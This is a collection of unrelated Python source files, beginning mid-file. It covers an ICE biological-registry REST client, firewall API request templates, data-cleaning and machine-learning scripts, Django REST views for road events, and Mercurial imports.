        "sentToAbrc": "sent_to_a_brc",
    }
    JSON_TYPE = "ARABIDOPSIS"
class IceApi(RestApiClient):
    """
    Defines the interface to ICE's REST API.
    TODO: extremely basic interface to ICE API; should eventually expand to cover more
    of the API, modularize (i.e. so others can just import jbei.ice), and document.
    """

    # Flag enabling data changes via this RestApiClient instance. When False, any attempts
    # to change data will result in an Exception. Data changes are disabled by default to
    # prevent accidental data loss or corruption.
    write_enabled = False

    # URL path forms for folders local to this ICE instance vs. folders hosted on a
    # Web of Registries partner instance
    local_folder_pattern = re.compile(r"^/folders/(\d+)/?$")
    web_folder_pattern = re.compile(r"^/partners/(\d+)/folders/(\d+)/?$")

    def __init__(self, auth, base_url=ICE_URL, result_limit=15, verify_ssl_cert=True):
        """
        Creates a new instance of IceApi

        :param auth: the authentication strategy for communication with ICE
        :param base_url: the base URL of the ICE install.
        :param result_limit: the maximum number of results that can be returned from a single
            query. The default is ICE's default limit at the time of writing. Note that ICE
            doesn't return paging-related data from its REST API, so to provide consistent
            tracking of how results are paged, some value has to be provided.
        :param verify_ssl_cert: False to skip verifying ICE's SSL certificate (e.g. for
            local test deployments)
        :raises ValueError: if no authentication mechanism is provided
        """
        if not auth:
            raise ValueError("A valid authentication mechanism must be provided")
        session = Session(auth=auth, verify_ssl_cert=verify_ssl_cert)
        super().__init__(base_url, session, result_limit)

    def _prevent_write_while_disabled(self):
        """
        Throws a RuntimeException if self._enable_write is false. This is part of a
        belt-AND-suspenders check for preventing data loss, especially if this code eventually
        makes its way into the hands of researchers inexperienced in programming. It's already
        prevented at least one accidental data change during EDD script development!
        """
        if not self.write_enabled:
            raise IceApiException(
                "To prevent accidental data loss or corruption, data changes "
                "to ICE are disabled. Use write_enabled to allow writes, but "
                "please use carefully!"
            )

    def get_entry(self, entry_id, suppress_errors=False):
        """
        Retrieves an ICE entry using any of the unique identifiers: UUID (preferred), part
        number (often globally unique, though not enforceably), or locally-unique primary
        key. Returns a Part object, or None if no part was found, or if there were
        suppressed errors in making the request. Note that this method doesn't currently
        support querying the web of registries for entries that aren't stored locally in this ICE
        instance.

        :param entry_id: the ICE ID for this entry (either the UUID, part number,
            locally-unique integer primary key)
        :param suppress_errors: true to catch and log exception messages and return
            None instead of raising Exceptions.
        :return: A Part object representing the response from ICE, or None if an
            Exception occurred but suppress_errors was true.
        """
        rest_url = f"{self.base_url}/rest/parts/{entry_id}"
        try:
            response = self.session.get(url=rest_url)
            response.raise_for_status()
            json_dict = json.loads(response.text)
            if json_dict:
                # NOTE(review): the meaning of the second argument isn't visible in
                # this file — presumably it silences type-specific warnings; confirm
                # against Entry.of before changing.
                return Entry.of(json_dict, False)
        except requests.exceptions.Timeout as e:
            if not suppress_errors:
                raise IceApiException() from e
            # BUG FIX: the original format string had two %s placeholders but only
            # one argument, which itself raised a logging error.
            logger.exception("Timeout requesting part %s", entry_id)
        except requests.exceptions.HTTPError as e:
            # response is always bound here: HTTPError is only raised by
            # raise_for_status(), after the assignment succeeded
            if response.status_code == requests.codes.not_found:
                return None
            elif not suppress_errors:
                raise IceApiException() from e
            logger.exception(
                "Error fetching part from ICE with entry_id %(entry_id)s. "
                'Response = %(status_code)d: "%(msg)s"'
                % {
                    "entry_id": entry_id,
                    "status_code": response.status_code,
                    "msg": response.reason,
                }
            )
        return None

    def get_folder(self, folder_id, partner_id=None):
        """
        Retrieves an ICE folder using its unique identifier.

        :param folder_id: the locally-unique integer primary key of the folder
        :param partner_id: the Web of Registries partner hosting the folder, if any
        :return: A Folder object representing the response from ICE, or None if ICE
            returned 404
        :raises IceApiException: if any other error occurs during the request
        """
        params = {}
        base_url = self.base_url
        if not partner_id:
            rest_url = f"{base_url}/rest/folders/{folder_id}"
        else:
            # TODO: this is the observed pattern from the ICE UI, but maybe a more standard,
            # URL-only scheme is also supported?
            rest_url = f"{base_url}/rest/partners/{partner_id}/folders"
            params["folderId"] = folder_id
        try:
            # BUG FIX: the original never passed `params`, so the partner-folder
            # request silently dropped the folderId query parameter
            response = self.session.get(url=rest_url, params=params)
            if response.status_code == requests.codes.not_found:
                return None
            response.raise_for_status()
            json_dict = json.loads(response.text)
            return Folder.of(json_dict)
        except Exception as e:
            raise IceApiException(f"Failed loading folder {folder_id}") from e

    def _init_folder_entries_params(self, folder_id, partner_id=None, sort=None):
        """
        Builds the (url, query-params) pair used to page through a folder's entries.

        :param sort: a field name, optionally prefixed with "-" for descending order
        """
        params = {}
        if not partner_id:
            rest_url = f"{self.base_url}/rest/folders/{folder_id}/entries"
        else:
            rest_url = f"{self.base_url}/rest/partners/{partner_id}/folders/entries"
            params["folderId"] = folder_id
        if sort:
            descending = sort.startswith("-")
            params["sort"] = sort[1:] if descending else sort
            # cast to lower case for Java ICE
            params["asc"] = str(not descending).lower()
        params["limit"] = self.result_limit
        return rest_url, params

    def get_folder_entries(self, folder_id, partner_id=None, sort=None):
        """
        Retrieves an ICE folder using its unique identifier, with Entry objects included.

        :param folder_id: the ICE ID for this folder
        :param partner_id: the Web of Registries partner hosting the folder, if any
        :param sort: a field name, optionally prefixed with "-" for descending order
        :return: A Folder object whose `entries` attribute is a generator lazily
            fetching additional pages, or None if ICE returned 404
        :raises IceApiException: if any other error occurs during the request
        """
        rest_url, params = self._init_folder_entries_params(folder_id, partner_id, sort)

        def fetch_entries(initial):
            # yield the already-fetched first page, then request later pages lazily
            for entry in initial:
                yield entry
            offsets = itertools.count(start=self.result_limit, step=self.result_limit)
            for offset in offsets:
                params["offset"] = offset
                response = self.session.get(url=rest_url, params=params)
                response.raise_for_status()
                page = Folder.of(response.json())
                if len(page.entries) == 0:
                    break
                for entry in page.entries:
                    yield entry

        try:
            response = self.session.get(url=rest_url, params=params)
            if response.status_code == requests.codes.not_found:
                return None
            response.raise_for_status()
            folder = Folder.of(response.json())
            # replace entries with a generator that fetches remaining pages on-demand
            folder.entries = fetch_entries(folder.entries)
            return folder
        except Exception as e:
            raise IceApiException(f"Failed loading folder entries {folder_id}") from e

    def folder_from_url(self, url):
        """
        Loads a folder from a UI-style ICE folder URL (e.g. `{base_url}/folders/123`).

        :raises IceApiException: if the URL doesn't match this ICE instance, is
            malformed, or the folder can't be loaded
        """
        try:
            url_parts = self._check_matching_base_url(url)
            folder_id, partner_id = self._extract_folder_id(url_parts.path)
            return self.get_folder(folder_id, partner_id)
        except IceApiException:
            raise
        except Exception as e:
            raise IceApiException(f"Failed to load ICE Folder at {url}") from e

    def _check_matching_base_url(self, url):
        """
        Parses `url` and verifies it points at this ICE instance; returns the parse result.

        :raises IceApiException: with a bad_request code on a malformed or foreign URL
        """
        url_parts = urlparse(str(url).lower().strip())
        if not (url_parts.netloc and url_parts.path):
            raise IceApiException(
                "URL does not match the expected format.",
                code=requests.codes.bad_request,
            )
        my_url_parts = urlparse(self.base_url)
        if url_parts.netloc != my_url_parts.netloc:
            raise IceApiException(
                "URL is in the wrong ICE instance.", code=requests.codes.bad_request
            )
        return url_parts

    def _extract_folder_id(self, path):
        """
        Extracts (folder_id, partner_id) from a folder URL path.

        Web-of-Registries paths are recognized but deliberately rejected below, so a
        successful return always has partner_id None.
        """
        match = self.local_folder_pattern.match(path)
        folder_id = None
        partner_id = None
        if match:
            folder_id = match.group(1)
        else:
            match = self.web_folder_pattern.match(path)
            if match:
                partner_id = match.group(1)
                folder_id = match.group(2)
        if folder_id is None:
            raise IceApiException(
                f"Unable to process the URL; must be of the form `{self.base_url}/folders/123`",
                code=requests.codes.bad_request,
            )
        elif partner_id is not None:
            raise IceApiException(
                "Folders from Web of Registries are not yet supported.",
                code=requests.codes.bad_request,
            )
        return folder_id, partner_id

    def search(self, search_terms):
        """
        Simple ICE search. Give a search term, get a list of entry dicts.

        :param search_terms: the query string to search for
        :return: the list of "entryInfo" dicts from ICE's search results
        :raises IceApiException: if the request fails for any reason
        """
        logger.info(f'Searching for ICE entries using search terms "{search_terms}"')
        url = f"{self.base_url}/rest/search"
        try:
            query_json = json.dumps({"queryString": search_terms})
            response = self.session.post(
                url,
                data=query_json,
                headers={"Content-Type": "application/json; charset=utf8"},
            )
            response.raise_for_status()
            results = response.json()
            return [record["entryInfo"] for record in results["results"]]
        except Exception as e:
            raise IceApiException(
                f"Could not complete search for {search_terms}"
            ) from e

    def unlink_entry_from_study(self, ice_entry_id, study_url):
        """
        Contacts ICE to find and remove all the links from the specified ICE part to the
        specified EDD study. In practical use, there will probably only ever be one per
        part/study combination.

        :param ice_entry_id: the id of the ICE entry whose link to the study
            should be removed (either a UUID or the numeric id)
        :param study_url: the study URL
        :raises RequestException: for any issues making requests to ICE REST API
        """
        for link in self.fetch_experiment_links(ice_entry_id):
            if link.get("url", None) == study_url:
                link_id = link.get("id")
                logger.info(f"Deleting link {link_id} from entry {ice_entry_id}")
                self.remove_experiment_link(ice_entry_id, link_id)
                return
        logger.warning(f"No link found for {study_url} in entry {ice_entry_id}")

    def fetch_experiment_links(self, ice_entry_id):
        """
        Yields the experiment-link dicts attached to an ICE entry.

        :raises IceApiException: if the request fails
        """
        try:
            response = self.session.get(
                f"{self.base_url}/rest/parts/{ice_entry_id}/experiments/"
            )
            response.raise_for_status()
            for link in response.json():
                yield link
        except Exception as e:
            raise IceApiException(
                f"Failed to load experiment links from {ice_entry_id}"
            ) from e

    def add_experiment_link(self, ice_entry_id, study_name, study_url):
        """Communicates with ICE to link an ICE entry to an EDD study"""
        self._prevent_write_while_disabled()
        payload = {"label": study_name, "url": study_url}
        try:
            response = self.session.post(
                f"{self.base_url}/rest/parts/{ice_entry_id}/experiments/",
                data=json.dumps(payload),
                headers={"Content-Type": "application/json"},
            )
            response.raise_for_status()
        except Exception as e:
            raise IceApiException(
                f"Failed to add experiment link {study_url} to {ice_entry_id}"
            ) from e

    def remove_experiment_link(self, ice_entry_id, link_id):
        """Removes the specified experiment link from an ICE entry"""
        self._prevent_write_while_disabled()
        try:
            response = self.session.delete(
                f"{self.base_url}/rest/parts/{ice_entry_id}/experiments/{link_id}/"
            )
            response.raise_for_status()
        except Exception as e:
            raise IceApiException(
                f"Failed to remove experiment link {link_id} from {ice_entry_id}"
            ) from e
|
from ..file_utils import convert_VariantFile_to_IndexedVariantFile, common_filepaths
from .load_utils import parallelize_per_pheno
def run(argv):
    """Convert every phenotype's variant file to a bgzipped, indexed copy, in parallel."""
    def input_path(pheno):
        return common_filepaths['pheno'](pheno['phenocode'])

    def output_path(pheno):
        return common_filepaths['pheno_gz'](pheno['phenocode'])

    parallelize_per_pheno(
        get_input_filepaths=input_path,
        get_output_filepaths=output_path,
        convert=convert,
        cmd='bgzip-phenos',
    )
def convert(pheno):
    """bgzip + index a single phenotype's variant file."""
    phenocode = pheno['phenocode']
    src = common_filepaths['pheno'](phenocode)
    dest = common_filepaths['pheno_gz'](phenocode)
    convert_VariantFile_to_IndexedVariantFile(src, dest)
|
# Copyright (c) 2018 Tsinghuanet, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# TnOS API request format templates.
# About api request message naming regulations:
# Prefix HTTP method
# ADD_XXX --> POST
# SET_XXX --> PUT
# DELETE_XXX --> DELETE
# GET_XXX --> GET
# Login
# Each constant below is a Jinja2 template that renders to a JSON request
# descriptor ({"path": ..., "method": ..., "body": ...}) for the TnOS API.

# Authenticate a session; `username`/`secretkey` are filled in by the caller.
LOGIN = """
{
"path": "/api/user/login",
"method": "POST",
"body": {
"username": "{{ username }}",
"password": "{{ secretkey }}"
}
}
"""
# Re-login redirect target (plain path fragment, not a JSON template).
RELOGIN = """login?redir=%2fapi%2fv2"""
# End the current session.
LOGOUT = """
{
"path": "/api/user/logout",
"method": "POST"
}
"""
# Keep-alive / session check.
TOUCH = """
{
"path": "/api/user/touch",
"method": "GET"
}
"""
# Create a VLAN subinterface bound to the default l2-trust zone.
ADD_SUB_INTF = """
{
"path": "/api/system_interface?vdom=root",
"method": "POST",
"body": {
"binding_zone": "l2zone",
"zone_l2": "l2-trust",
"vlanid": "{{ vlanid }}",
"type": "subinterface",
"interface":"{{ intf_name }}",
"mkey": "{{ intf_name }}.{{ vlanid }}",
"mkey_id": " "
}
}
"""
# Delete a subinterface by name and id.
DEL_SUB_INTF = """
{
"path": "/api/system_interface?vdom=root",
"method": "DELETE",
"body": {
"type": "subinterface",
"mkey": "{{ intf_name }}",
"mkey_id": "{{ id }}"
}
}
"""
# List all interfaces in the root vdom.
GET_INTF_INFO = """
{
"path": "/api/system_interface?vdom=root",
"method": "GET"
}
"""
# Reconfigure an interface; optional fields fall back to defaults
# (DNS proxy off, MTU 1500, no VLAN).
CFG_INTF = """
{
"path": "/api/system_interface/{{ intf_name }}?vdom=root",
"method": "PUT",
"body": {
"mode": "static",
"binding_zone": "l3zone",
"zone_l3": "trust",
{% if allows is defined %}
"allowaccess": [
{% for allow in allows[:-1] %}
"{{ allow }}",
{% endfor %}
"{{ allows[-1] }}"
],
{% else %}
"allowaccess": [],
{% endif %}
"_id": "{{ intf_name }}",
{% if dns_state is defined %}
"enableDNSproxy": "{{ dns_state }}",
{% else %}
"enableDNSproxy": "disable",
{% endif %}
{% if mtu is defined %}
"mtu": "{{ mtu }}",
{% else %}
"mtu": "1500",
{% endif %}
{% if vlanid is defined %}
"vlanid": "{{ vlanid }}",
{% else %}
"vlanid": " ",
{% endif %}
"interface":"ethernet0",
"type": "{{ type }}",
"ip": "{{ ip_prefix }}",
"mkey": "{{ intf_name }}",
"mkey_id": "{{ id }}"
}
}
"""
# Create a static route; gateway may be an IP or an interface.
ADD_STATIC_ROUTE = """
{
"path": "/api/router_static?vdom=root",
"method": "POST",
"body": {
{% if gw_type is defined %}
"gw_type": "{{ gw_type }}",
{% else %}
"gw_type": "ip",
{% endif %}
{% if gw_ip is defined %}
"gw_ip": "{{ gw_ip }}",
{% endif %}
{% if gw_interface is defined %}
"gw_interface": "{{ gw_interface }}",
{% endif %}
{% if distance is defined %}
"distance": "{{ distance }}",
{% endif %}
"dest": "{{ dest }}",
"netmask": "{{ netmask }}"
}
}
"""
# Delete a static route; mirrors ADD_STATIC_ROUTE plus the "mkey" selector.
DEL_STATIC_ROUTE = """
{
"path": "/api/router_static?vdom=root",
"method": "DELETE",
"body": {
{% if gw_type is defined %}
"gw_type": "{{ gw_type }}",
{% else %}
"gw_type": "ip",
{% endif %}
{% if gw_ip is defined %}
"gw_ip": "{{ gw_ip }}",
{% endif %}
{% if gw_interface is defined %}
"gw_interface": "{{ gw_interface }}",
{% endif %}
{% if distance is defined %}
"distance": "{{ distance }}",
{% endif %}
"mkey": "{{ dest }}",
"dest": "{{ dest }}",
"netmask": "{{ netmask }}"
}
}
"""
# Create an address object, either as an IP prefix or a min/max range.
ADD_ADDRESS_ENTRY = """
{
"path": "/api/system_address?vdom=root",
"method": "POST",
"body": {
"mkey": "{{ name }}",
{% if type is defined %}
"type": "{{ type }}",
{% else %}
"type": "ip-prefix",
{% endif %}
{% if ip_prefix is defined %}
"ip-prefix": "{{ ip_prefix }}"
{% else %}
"ip-min": "{{ ip_min }}",
"ip-max": "{{ ip_max }}"
{% endif %}
}
}
"""
# Delete an address object by name.
DEL_ADDRESS_ENTRY = """
{
"path": "/api/system_address?vdom=root",
"method": "DELETE",
"body": {
"mkey": "{{ name }}"
}
}
"""
# Create a service object with a single protocol/port-range member.
ADD_SERVICE_ENTRY = """
{
"path": "/api/system_service?vdom=root",
"method": "POST",
"body": {
{% if desc is defined %}
"description":"{{ desc }}",
{% else %}
"description":"",
{% endif %}
"member": [
{
"destination_port_max":"{{ dst_port_max }}",
"destination_port_min":"{{ dst_port_min }}",
"protocol":"{{ protocol }}",
"source_port_max":"{{ src_port_max }}",
"source_port_min":"{{ src_port_min }}"
}
],
"mkey":"{{ name }}"
}
}
"""
# Delete a (non-predefined) service object; mirrors ADD_SERVICE_ENTRY.
DEL_SERVICE_ENTRY = """
{
"path": "/api/system_service?vdom=root",
"method": "DELETE",
"body": {
{% if desc is defined %}
"description":"{{ desc }}",
{% else %}
"description":"",
{% endif %}
"member": [
{
"destination_port_max":"{{ dst_port_max }}",
"destination_port_min":"{{ dst_port_min }}",
"protocol":"{{ protocol }}",
"source_port_max":"{{ src_port_max }}",
"source_port_min":"{{ src_port_min }}"
}
],
"mkey":"{{ name }}",
"predefine": 0
}
}
"""
# Create a source-NAT rule; most fields have sensible defaults when omitted.
ADD_SNAT_RULE = """
{
"path": "/api/policy_nat_source_nat/?vdom=root",
"method": "POST",
"body": {
"id": "{{ id }}",
{% if desc is defined %}
"description": "{{ desc }}",
{% endif %}
"saddr":"{{ saddr }}",
{% if daddr is defined %}
"daddr": "{{ daddr }}",
{% else %}
"daddr":"Any",
{% endif %}
{% if eif is defined %}
"eif": "{{ eif }}",
{% endif %}
{% if log_flag is defined %}
"log":"{{ log_flag }}",
{% else %}
"log":"disable",
{% endif %}
{% if reverse_flag is defined %}
"reverse":"{{ reverse_flag }}",
{% else %}
"reverse":"disable",
{% endif %}
{% if service is defined %}
"service":"{{ service }}",
{% else %}
"service":"Any",
{% endif %}
{% if status is defined %}
"status":"{{ status }}",
{% else %}
"status":"enable",
{% endif %}
{% if sticky_flag is defined %}
"sticky":"{{ sticky_flag }}",
{% else %}
"sticky":"disable",
{% endif %}
{% if trans is defined %}
"trans":"{{ trans }}",
{% else %}
"trans":"trans-to",
{% endif %}
"trans_addr":"{{ trans_addr }}",
{% if trans_mode is defined %}
"trans_mode":"{{ trans_mode }}"
{% else %}
"trans_mode":"dynamicport"
{% endif %}
}
}
"""
# Delete a source-NAT rule; body mirrors ADD_SNAT_RULE.
DEL_SNAT_RULE = """
{
"path": "/api/policy_nat_source_nat/?vdom=root",
"method": "DELETE",
"body": {
"id": "{{ id }}",
{% if desc is defined %}
"description": "{{ desc }}",
{% endif %}
"saddr":"{{ saddr }}",
{% if daddr is defined %}
"daddr": "{{ daddr }}",
{% else %}
"daddr":"Any",
{% endif %}
{% if eif is defined %}
"eif": "{{ eif }}",
{% endif %}
{% if log_flag is defined %}
"log":"{{ log_flag }}",
{% else %}
"log":"disable",
{% endif %}
{% if reverse_flag is defined %}
"reverse":"{{ reverse_flag }}",
{% else %}
"reverse":"disable",
{% endif %}
{% if service is defined %}
"service":"{{ service }}",
{% else %}
"service":"Any",
{% endif %}
{% if status is defined %}
"status":"{{ status }}",
{% else %}
"status":"enable",
{% endif %}
{% if sticky_flag is defined %}
"sticky":"{{ sticky_flag }}",
{% else %}
"sticky":"disable",
{% endif %}
{% if trans is defined %}
"trans":"{{ trans }}",
{% else %}
"trans":"trans-to",
{% endif %}
"trans_addr":"{{ trans_addr }}",
{% if trans_mode is defined %}
"trans_mode":"{{ trans_mode }}"
{% else %}
"trans_mode":"dynamicport"
{% endif %}
}
}
"""
# Reorder a source-NAT rule relative to another (before/after dstKey).
MOVE_SNAT_RULE = """
{
"path": "/api/policy_nat_source_nat/move/move?vdom=root&srcKey={{ srcKey }}&move_act={{ action }}&dstKey={{ dstKey }}",
"method": "PUT",
"body": {
"dst":"{{ dstKey }}",
"src":"{{ srcKey }}",
"move_act":"{{ action }}",
"_id":"move"
}
}
"""
# Create a security policy rule; addresses/services default to "Any",
# zones to "trust".
ADD_RULE = """
{
"path": "/api/policy_security_rule?vdom=root",
"method": "POST",
"body": {
"id":"{{ id }}",
"action":"{{ action }}",
"mkey":"{{ name }}",
{% if desc is defined %}
"description":"{{ desc }}",
{% endif %}
{% if daddr is defined %}
"daddr": ["{{ daddr }}"],
{% else %}
"daddr":["Any"],
{% endif %}
{% if destinationAddr is defined %}
"destinationAddr":"{{ destinationAddr }}",
{% else %}
"destinationAddr":"address",
{% endif %}
{% if dzone is defined %}
"dzone":"{{ dzone }}",
{% else %}
"dzone":"trust",
{% endif %}
{% if saddr is defined %}
"saddr": ["{{ saddr }}"],
{% else %}
"saddr":["Any"],
{% endif %}
{% if serGroup is defined %}
"serGroup":"{{ serGroup }}",
{% else %}
"serGroup":"address",
{% endif %}
{% if service is defined %}
"service": ["{{ service }}"],
{% else %}
"service":["Any"],
{% endif %}
{% if sourceAddr is defined %}
"sourceAddr":"{{ sourceAddr }}",
{% else %}
"sourceAddr":"address",
{% endif %}
{% if status is defined %}
"status":"{{ status }}",
{% else %}
"status":"enable",
{% endif %}
{% if szone is defined %}
"szone":"{{ szone }}"
{% else %}
"szone":"trust"
{% endif %}
}
}
"""
# Delete a security policy rule; includes the empty group/schedule lists the
# API expects on DELETE.
DEL_RULE = """
{
"path": "/api/policy_security_rule?vdom=root",
"method": "DELETE",
"body": {
"id":"{{ id }}",
"action":"{{ action }}",
"mkey":"{{ name }}",
{% if desc is defined %}
"description":"{{ desc }}",
{% endif %}
{% if daddr is defined %}
"daddr": ["{{ daddr }}"],
{% else %}
"daddr":["Any"],
{% endif %}
"daddrgroup":[],
{% if dzone is defined %}
"dzone":"{{ dzone }}",
{% else %}
"dzone":"trust",
{% endif %}
{% if saddr is defined %}
"saddr": ["{{ saddr }}"],
{% else %}
"saddr":["Any"],
{% endif %}
"saddrgroup":[],
{% if service is defined %}
"service": ["{{ service }}"],
{% else %}
"service":["Any"],
{% endif %}
"servicegroup":[],
"sched":[],
{% if status is defined %}
"status":"{{ status }}",
{% else %}
"status":"enable",
{% endif %}
{% if szone is defined %}
"szone":"{{ szone }}"
{% else %}
"szone":"trust"
{% endif %}
}
}
"""
# Reorder a security policy rule relative to another (before/after dstKey).
MOVE_RULE = """
{
"path": "/api/policy_security_rule/move/move?vdom=root&srcKey={{ srcKey }}&move_act={{ action }}&dstKey={{ dstKey }}",
"method": "PUT",
"body": {
"dst":"{{ dstKey }}",
"src":"{{ srcKey }}",
"move_act":"{{ action }}",
"_id":"move"
}
}
"""
|
import sqlite3
import pandas as pd
import numpy
import matplotlib.pyplot as plt
import re
# Open (or create) the target database and load the raw CSV to import.
con = sqlite3.connect('works.sqlite')
df = pd.read_csv("works.csv")
cursor = con.cursor()
def clean(field):
    """Strip angle-bracket (HTML-like) tags from a field, coercing it to str first."""
    text = str(field)
    return re.sub(r'\<[^>]*\>', '', text)
# Sanitize free-text columns, load the data, then normalize the gender and
# education columns into lookup tables.
df['skills'] = df['skills'].apply(clean)
df['otherInfo'] = df['otherInfo'].apply(clean)
# NOTE(review): 'append' means re-running this script duplicates rows in
# `works` — confirm whether the table should be dropped/replaced first.
df.to_sql("works", con, if_exists='append', index=False)
con.commit()

# --- gender normalization ---
cursor.execute('drop table if exists genders')
cursor.execute('CREATE TABLE genders('
               'id INTEGER PRIMARY KEY AUTOINCREMENT,'
               'gender TEXT)')
# BUG FIX: the original adjacent string literals concatenated without
# separating spaces (e.g. "genders(gender)SELECT", "genderFROM works",
# "worksADD COLUMN"), producing invalid SQL. Trailing spaces added below.
cursor.execute('INSERT INTO genders(gender) '
               'SELECT DISTINCT gender '
               'FROM works WHERE gender IS NOT NULL')
cursor.execute('ALTER TABLE works '
               'ADD COLUMN gender_id INTEGER REFERENCES genders(id)')
cursor.execute('UPDATE works SET gender_id = '
               '(SELECT id FROM genders '
               'WHERE gender = works.gender)')
cursor.execute('ALTER TABLE works '
               'DROP COLUMN gender')
con.commit()

# --- education-level normalization (same pattern as genders) ---
cursor.execute('drop table if exists education')
cursor.execute('CREATE TABLE education'
               '(id INTEGER PRIMARY KEY AUTOINCREMENT, '
               'level_of_edu TEXT)')
cursor.execute('INSERT INTO education(level_of_edu)'
               ' SELECT DISTINCT educationType '
               'FROM works'
               ' WHERE educationType IS NOT NULL')
cursor.execute('ALTER TABLE works'
               ' ADD COLUMN educationType_id INTEGER REFERENCES education(id)')
cursor.execute('UPDATE works'
               ' SET educationType_id ='
               ' (SELECT id'
               ' FROM education'
               ' WHERE level_of_edu = works.educationType)')
cursor.execute('ALTER TABLE works'
               ' DROP COLUMN educationType')
con.commit()
import pathlib
import mypyc.build
def build(setup_kwargs: dict) -> None:
    """
    This function is mandatory in order to build the extensions.

    Collects every .py file under the templated package directory and hands
    them to mypyc for compilation.
    """
    package_root = pathlib.Path(__file__).resolve().parent / "{{cookiecutter.package_name}}"
    sources = [str(path) for path in package_root.rglob("*.py")]
    setup_kwargs.update({"ext_modules": mypyc.build.mypycify(sources)})
|
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.linear_model import LogisticRegression
# BUG FIX: this file referenced several names that were never defined or
# imported (`selector`, `make_column_transformer`, `make_pipeline`,
# `cross_validate`, `categorical_columns`). The imports and the categorical
# selector below fill the reproducible gaps.
# NOTE(review): `data` and `target` are still undefined in this file — they
# are presumably provided by earlier setup; confirm and add the data loading.
from sklearn.compose import make_column_selector as selector
from sklearn.compose import make_column_transformer
from sklearn.model_selection import cross_validate
from sklearn.pipeline import make_pipeline

# Split columns by dtype: non-object -> numerical, object -> categorical.
numerical_columns_selector = selector(dtype_exclude=object)
numerical_columns = numerical_columns_selector(data)
categorical_columns_selector = selector(dtype_include=object)
categorical_columns = categorical_columns_selector(data)

# Scale numeric features; one-hot encode categorical ones, ignoring
# categories unseen during fit.
preprocessor = make_column_transformer(
    (StandardScaler(), numerical_columns),
    (OneHotEncoder(handle_unknown="ignore"), categorical_columns),
)

model = make_pipeline(preprocessor, LogisticRegression(max_iter=1_000))
cv_results = cross_validate(model, data, target)
scores = cv_results["test_score"]
print(f"The accuracy is: {scores.mean():.3f} +/- {scores.std():.3f}")
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from . import models, serializers
from v2x_solution.road import models as road_models
class Events(APIView):
    """List all events, or create a new event tied to an existing road."""

    def get(self, req, format=None):
        # return every event, serialized
        queryset = models.Event.objects.all()
        payload = serializers.EventSerializer(queryset, many=True).data
        return Response(data=payload, status=status.HTTP_200_OK)

    def post(self, req, format=None):
        creator = req.user
        # the referenced road must already exist
        try:
            road = road_models.Road.objects.get(name=req.data.get('location'))
        except road_models.Road.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        serializer = serializers.EventSerializer(data=req.data)
        if not serializer.is_valid():
            return Response(status=status.HTTP_400_BAD_REQUEST)
        serializer.save(creator=creator, road=road)
        return Response(status=status.HTTP_201_CREATED)
class ModerateEvent(APIView):
    """Retrieve, update, or delete a single event by its id."""

    def find_event(self, event_id):
        """Return the Event with `event_id`, or None if it does not exist."""
        try:
            return models.Event.objects.get(id=event_id)
        except models.Event.DoesNotExist:
            return None

    def get(self, req, event_id, format=None):
        """Fetch one event."""
        event = self.find_event(event_id)
        if event is None:
            return Response(status=status.HTTP_404_NOT_FOUND)
        serializer = serializers.EventSerializer(event)
        return Response(data=serializer.data, status=status.HTTP_200_OK)

    def put(self, req, event_id, format=None):
        """Partially update an event; only its creator may do so."""
        event = self.find_event(event_id)
        if event is None:
            return Response(status=status.HTTP_404_NOT_FOUND)
        if event.creator != req.user:
            # BUG FIX: the original passed the status code positionally, i.e.
            # as the response *body*, so the client received HTTP 200 with
            # "401" as data. It must be the `status` keyword argument.
            return Response(status=status.HTTP_401_UNAUTHORIZED)
        serializer = serializers.EventSerializer(event, data=req.data, partial=True)
        if serializer.is_valid():
            serializer.save(creator=req.user)
            return Response(data=serializer.data, status=status.HTTP_200_OK)
        return Response(data=serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def delete(self, req, event_id, format=None):
        """Delete an event; only its creator may do so."""
        event = self.find_event(event_id)
        if event is None:
            return Response(status=status.HTTP_404_NOT_FOUND)
        if event.creator != req.user:
            # BUG FIX: same positional-status bug as in put() above.
            return Response(status=status.HTTP_401_UNAUTHORIZED)
        event.delete()
        return Response(status=status.HTTP_200_OK)
class Search(APIView):
    """Search events by name, time, or road location via query parameters.

    Handles URLs like:
      /events/search/?name=행사
      /events/search/?time=2018-07-12
      /events/search/?location=inha-ro
    """

    def get(self, req, format=None):
        # checked in priority order: name, then time, then location
        lookups = (
            ('name', 'name__istartswith'),
            ('time', 'time__istartswith'),
            ('location', 'road__name__istartswith'),
        )
        for param, field in lookups:
            value = req.query_params.get(param, None)
            if value is not None:
                matches = models.Event.objects.filter(**{field: value})
                payload = serializers.EventSerializer(matches, many=True).data
                return Response(data=payload, status=status.HTTP_200_OK)
        # no recognized query parameter was supplied
        return Response(status=status.HTTP_404_NOT_FOUND)
|
from rest_framework import serializers
from .models import Project
class ProjectSerializer(serializers.ModelSerializer):
    """Serializes Project instances for the API (read/write of the listed fields)."""
    class Meta:
        model = Project
        fields = ('title', 'description', 'framework', 'image', 'owner')
# debugcommands.py - command processing for debug* commands
#
# Copyright 2005-2016 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import codecs
import collections
import difflib
import errno
import operator
import os
import random
import re
import socket
import ssl
import stat
import string
import subprocess
import sys
import time
from .i18n import _
from .node import (
bin,
hex,
nullhex,
nullid,
nullrev,
short,
)
from . import (
bundle2,
changegroup,
cmdutil,
color,
context,
dagparser,
encoding,
error,
exchange,
extensions,
filemerge,
filesetlang,
formatter,
hg,
httppeer,
localrepo,
lock as lockmod,
logcmdutil,
merge as mergemod,
obsolete,
obsutil,
phases,
policy,
pvec,
pycompat,
registrar,
repair,
revlog,
revset,
revsetlang,
scmutil,
setdiscovery,
simplemerge,
sshpeer,
sslutil,
streamclone,
templater,
treediscovery,
upgrade,
url as urlmod,
util,
vfs as vfsmod,
wireprotoframing,
wireprotoserver,
wireprotov2peer,
)
from .utils import (
cborutil,
dateutil,
procutil,
stringutil,
)
from .revlogutils import (
deltas as deltautil
)
